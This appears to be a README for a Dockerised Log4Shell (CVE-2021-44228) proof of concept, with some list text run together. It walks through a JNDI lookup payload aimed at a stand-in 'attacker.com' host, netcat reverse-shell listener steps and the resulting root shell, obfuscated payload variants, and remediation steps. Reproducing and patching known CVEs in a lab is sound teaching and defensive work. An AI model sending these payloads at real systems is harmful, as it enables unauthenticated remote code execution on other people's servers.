
Log4Shell (CVE-2021-44228) PoC
Reproduce, exploit, and remediate a known critical CVE in a Dockerised environment.
This PoC demonstrates CVE-2021-44228 (Log4Shell) in a Spring Boot application.
CVE: 2021-44228
CVSS: 10.0 (Critical)
Affected component: Apache Log4j (<= 2.14.1)
${...}) to dynamically resolve values inside log messages.${jndi:ldap://attacker.com:1389/a}.Exploit.class.Exploit.class via HTTP.Exploit runs, spawning a reverse shell back to the attacker.Impact: Unauthenticated RCE - highest possible severity.
Who/what is at risk:
Consequences:
make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi: patterns) with a WAF or middleware.-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz, etc.).log4j-core-*.jar, including fat JARs.${jndi:...}, ${${lower:j}ndi:...}, etc.).